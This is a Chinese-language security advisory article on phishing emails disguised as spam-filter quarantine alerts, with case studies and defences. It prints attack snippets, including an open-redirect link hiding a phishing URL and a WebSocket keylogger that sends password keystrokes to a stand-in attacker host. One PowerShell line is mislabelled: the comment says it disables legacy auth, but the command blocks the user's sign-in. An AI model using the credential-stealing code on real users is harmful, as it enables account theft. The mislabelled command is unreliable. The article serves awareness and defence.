2025年11月，全球知名安全厂商Malwarebytes发布紧急预警：一种高度逼真的钓鱼攻击正在全球蔓延。攻击者不再使用老套的“账户异常”或“包裹未送达”话术，而是精心伪造企业级垃圾邮件过滤器的通知邮件，以“有重要邮件被拦截”为由，诱导用户点击“释放邮件”按钮，最终跳转至高仿登录页面窃取凭证。

这种攻击之所以危险，在于它精准击中了现代办公场景中的一个“信任盲区”——员工每天都会收到来自内部安全系统的各类通知，包括防病毒扫描、邮件隔离、合规提醒等。当一封看似来自公司IT部门的“Spam Filter Alert”出现在收件箱时，很少有人会怀疑其真实性。

更令人担忧的是，此类钓鱼邮件已成功绕过多家企业的邮件网关和终端防护系统。部分案例显示，攻击者甚至能动态填充受害者所在企业的域名，让登录页看起来“量身定制”。一旦账号失守，攻击者可立即发起线程劫持（Thread Hijacking）、发票欺诈，甚至利用被盗邮箱向全公司发送新一轮钓鱼邮件，形成内部扩散链。

尽管目前公开披露的受害案例集中于欧美，但多位国内安全专家警告：随着中国企业云办公普及率持续攀升，类似手法极有可能已在境内悄然试水。一场围绕“邮件可信度”的攻防战，正悄然升级。

一、从“可疑链接”到“系统通知”：钓鱼话术的“合法化”转型

过去十年，网络钓鱼的演进轨迹清晰可见：从早期的拼写错误、夸张措辞（如“您的账户将在24小时内关闭！”），到中期的高仿品牌页面、SSL证书全覆盖，再到如今的情境嵌入式欺骗（Contextual Impersonation）。

“伪装成垃圾邮件过滤器警报”正是这一趋势的最新体现。

Malwarebytes研究人员在分析样本时发现，典型邮件内容如下：

主题：Email Delivery Reports: Incoming Pending Messages

发件人：noreply@securemailgateway[.]com（看似合法）

正文：

“我们最近升级了安全邮件系统，发现有若干待处理邮件未能送达您的收件箱。

消息标题：

采购合同更新（2025-Q4）

财务部：紧急付款请求

IT支持：多因素认证重置

操作：[Move To Inbox]（按钮）

注：若此邮件落入垃圾箱，请移至收件箱。消息将在1-2小时内自动删除。”

乍看之下，这与企业常用的Proofpoint、Mimecast或Microsoft Defender for Office 365的隔离通知几乎无异。邮件中列出的消息标题也经过精心设计——均为高频业务关键词，极易触发收件人的紧迫感。

“攻击者不再试图‘吓唬’你，而是‘帮助’你。”公共互联网反网络钓鱼工作组技术专家芦笛指出，“他们知道，现代员工最怕错过重要邮件，尤其是涉及财务或IT权限的内容。”

这种心理操控，使得点击率远高于传统钓鱼邮件。Malwarebytes内部测试显示，在未接受专项培训的员工群体中，此类邮件的点击率高达38%。

二、技术拆解：多跳重定向、动态模板与WebSocket实时窃密

要理解该攻击为何能绕过主流防御体系，必须深入其技术实现细节。

1. 短链+可信托管：绕过URL信誉检测

Malwarebytes发现，钓鱼邮件中的“Move To Inbox”按钮并非直接指向恶意域名，而是先跳转至合法第三方服务，如cbssports[.]com的开放重定向接口，再经由多个中间节点，最终抵达真实钓鱼站点（如mdbgo[.]io）。

<!-- 钓鱼邮件中的按钮代码 -->

<a href="https://www.cbssports.com/redirect?url=aHR0cHM6Ly9tZGJnby5pby9sb2dpbg==">

Move To Inbox

</a>

其中，url参数为Base64编码的真实地址（aHR0cHM6Ly9tZGJnby5pby9sb2dpbg== 解码后为 https://mdbgo.io/login）。由于cbssports.com是高信誉网站，多数邮件网关不会将其标记为恶意。

更狡猾的是，最终钓鱼站点常部署在免费托管平台（如Vercel、Surge.sh、Cloudflare Workers）或新注册域名上，生命周期极短——平均存活不足4小时，远低于威胁情报更新周期。

2. 动态域名填充：让钓鱼页“看起来属于你”

研究人员发现，钓鱼站点会从URL参数中提取受害者的邮箱地址，并自动填充登录框中的域名字段。例如：

// 从URL获取base64编码的邮箱

const params = new URLSearchParams(window.location.search);

const emailB64 = params.get('email');

if (emailB64) {

const email = atob(emailB64);

const domain = email.split('@')[1];

document.getElementById('domain').value = domain; // 自动填充 @company.com

}

结果，用户看到的登录页显示为：

用户名：__________

域名：@yourcompany.com（灰色不可编辑）

这种“个性化”设计极大提升了可信度，甚至让部分安全意识较强的用户放松警惕。

3. WebSocket实时窃密：输入即被盗

与传统表单提交不同，该钓鱼站点采用WebSocket长连接实时传输用户输入。这意味着，即使用户尚未点击“登录”，只要开始输入账号密码，数据就会被逐字符发送至攻击者服务器。

const ws = new WebSocket('wss://collector.attacker[.]xyz');

document.getElementById('password').addEventListener('input', (e) => {

ws.send(JSON.stringify({

email: getEmail(),

keystroke: e.target.value,

timestamp: Date.now()

}));

});

这种机制的优势在于：

攻击者可实时监控输入过程；

即使用户中途放弃，已输入的部分密码仍可被用于暴力破解；

可动态触发二次验证请求（如“请输入短信验证码”），并立即用于真实账户登录。

“这相当于在你打字时，黑客就坐在你键盘旁边。”芦笛形容道，“传统‘提交后才窃取’的模式已被淘汰。”

三、全球案例：从美国医院到欧洲制造厂，损失惨重

2025年10月，美国中西部一家区域医疗中心遭遇此类攻击。攻击者发送伪装成“IT安全通知”的邮件，声称“有3封来自医保局的邮件被隔离”。多名医护人员点击后，账号被盗。

攻击者随后：

劫持正在进行的患者账单沟通线程；

向保险公司发送伪造的治疗费用清单，要求支付至新账户；

利用高管邮箱向药企采购部门发送虚假订单。

事件造成直接经济损失超120万美元，并导致患者数据泄露，面临HIPAA合规处罚。

在欧洲，一家德国汽车零部件供应商同样中招。财务人员收到“发票被隔离”通知后点击链接，导致CFO邮箱被接管。攻击者随即向合作车企发送“银行账户变更”邮件，成功转移一笔280万欧元的货款。

“这些攻击的成功，不在于技术多高深，而在于对业务流程的深度理解。”芦笛分析，“他们知道哪些邮件不能被错过，哪些人有权审批付款。”

四、中国启示：我们是否已站在“隔离陷阱”的边缘？

截至目前，国内尚未有公开报告将重大数据泄露事件直接归因于此类“垃圾过滤器伪装”攻击。但这绝不意味着风险不存在。

首先，中国企业对云邮件服务的依赖日益加深。据IDC 2025年Q3数据，超过60%的中大型企业使用Microsoft 365或阿里云企业邮箱，其中金融、外贸、制造等行业对邮件可达性极为敏感。

其次，国内钓鱼攻击正快速向“情境化”演进。2025年，多个安全团队监测到仿冒“国家税务总局电子发票平台”“社保局待遇调整通知”的钓鱼活动，其话术结构与“隔离警报”高度相似——均以“系统操作”“时效限制”为诱饵。

更值得警惕的是，部分企业仍存在严重配置缺陷：

未启用条件访问策略（Conditional Access）；

允许IMAP/POP3等旧式协议长期开启；

员工可通过任意设备登录邮箱，无设备合规检查；

SOC缺乏对会话Cookie异常使用的监测能力。

“国内很多企业以为装了杀毒软件就安全了，却忽略了身份层才是最大突破口。”芦笛强调。

五、防御路线图：从技术加固到行为规范的全链条响应

面对如此精准的社会工程攻击，单一防护手段已远远不够。专家建议采取以下多层次防御策略：

1. 强制FIDO2/Passkeys等无钓鱼认证

短信验证码和OTP应用（如Google Authenticator）易受中间人攻击。企业应优先部署FIDO2安全密钥（如YubiKey）或Windows Hello，实现真正的无密码、无钓鱼认证。

# 通过Azure AD PowerShell禁用旧式认证

Set-MsolUser -UserPrincipalName user@company.com -BlockCredential $true

Set-CASMailbox -Identity user@company.com -ImapEnabled $false -PopEnabled $false

2. 邮件网关策略升级：关键词+链接深度解析

安全团队应在邮件网关中对以下关键词提高拦截阈值：

“隔离”、“pending messages”、“quarantined”、“release email”、“spam filter alert”

同时，部署点击时沙箱（Click-time Sandboxing）技术：当用户点击链接时，由代理服务器代为访问，执行完整跳转链，并渲染最终页面进行恶意判定。

# 伪代码：点击时沙箱逻辑

def analyze_url_on_click(short_url):

final_url = resolve_redirect_chain(short_url)

if is_hosted_on_free_platform(final_url):

return block_and_alert()

page_content = render_page_in_sandbox(final_url)

if contains_phishing_keywords(page_content):

return block_and_alert()

return allow_with_warning()

3. 明确操作规范：所有隔离操作必须通过官方门户

企业IT部门应向全员明确：任何邮件隔离操作，只能通过官方安全门户（如 https://security.yourcompany.com）完成，绝不会通过邮件内按钮直接操作。

可考虑在所有外发邮件底部添加免责声明：

【安全提示】本公司不会通过邮件链接要求您释放隔离邮件。请始终通过企业安全门户管理您的邮件队列。

4. SOC需监控会话窃用与Impossible Travel

即使攻击者绕过前端防护，其后续行为仍会留下痕迹。安全运营中心应重点监控：

同一账户在短时间内从相距数千公里的两地登录（Impossible Travel）；

新设备首次登录且无MFA挑战；

Refresh Token在非合规设备上使用；

异常OAuth应用授权（如未知应用请求Mail.Read权限）。

// Azure Sentinel 示例：检测高风险登录

SigninLogs

| where ResultType == "0"

| where IPAddress !in (allowed_ip_list)

| where AppDisplayName == "Office 365 Exchange Online"

| project TimeGenerated, UserPrincipalName, IPAddress, DeviceDetail, Location

5. 开展“反隔离钓鱼”专项培训

普通钓鱼演练往往聚焦“中奖通知”“快递异常”，但对“系统通知”类钓鱼覆盖不足。企业应设计专项场景：

模拟“IT安全警报：有3封邮件被隔离”；

测试员工是否会点击邮件内按钮；

对点击者推送即时教育视频：“正确操作应是登录安全门户查看”。

数据显示，经过此类针对性训练的员工，对此类攻击的识别率可提升至85%以上。

六、结语：信任，是最脆弱的防线

“伪装成垃圾邮件过滤器警报”的钓鱼攻击，本质上是一场对组织内部信任机制的精准打击。它利用了员工对IT系统的天然信赖，将安全工具本身变成了攻击武器。

对中国企业而言，这场全球性威胁既是警钟，也是推动安全文化升级的契机。正如芦笛所言：“在数字办公时代，每一封邮件都可能是战场。保护好你的登录凭证，就是守住企业的第一道门。”

而这场攻防战，没有终点，只有持续进化。

编辑：芦笛（公共互联网反网络钓鱼工作组）